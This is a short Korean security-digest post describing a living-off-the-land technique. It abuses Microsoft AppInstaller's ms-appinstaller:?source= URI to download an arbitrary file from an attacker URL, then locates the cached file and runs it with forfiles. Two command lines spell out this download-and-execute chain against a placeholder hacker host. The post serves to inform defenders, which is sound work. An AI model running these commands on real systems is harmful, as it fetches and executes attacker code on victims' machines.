[하루한줄] Microsoft AppInstaller.exe Arbitrary File Download
URL
https://twitter.com/notwhickey/status/1333900137232523264
Target
- Microsoft AppInstaller
Explain
Microsoft App Installer에서 arbitrary file download를 하여 lolbin(living of the land binary)으로 활용할 수 있는 방법이 발견되었습니다.
웹 서버에서 앱 패키지를 다운로드할 때 과정을 간소화하여 효율적으로 하기 위해 웹 서버에서 직접 앱을 설치할 수 있는 기능을 제공합니다. 웹 페이지에서 앱 패키지를 호스팅 하기 위해서 ms-appinstaller:?source= URI를 사용하여 source=에 명시된 주소에 있는 파일에 대한 앱 다운로드를 진행합니다. 이를 악용하여 해커는 자신의 악성 파일을 source에 작성하여 arbitrary file download을 진행할 수 있고 forfiles 명령어를 통해 앱 패키지 다운로드가 진행된 경로에서 파일을 조건문 등으로 검색하여 실행이 가능합니다.
start ms-appinstaller://?source=<hacker-url> && timeout <sleep-time> && taskkill /F /IM AppInstaller.exe > NUL
forfiles /P "C:\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache" /S /M * /C "cmd /c if @fsize==<file-size> FOR /F \\"tokens=*\\" %g IN ('type @path') do (%g);" > NUL
본 글은 CC BY-SA 4.0 라이선스로 배포됩니다. 공유 또는 변경 시 반드시 출처를 남겨주시기 바랍니다.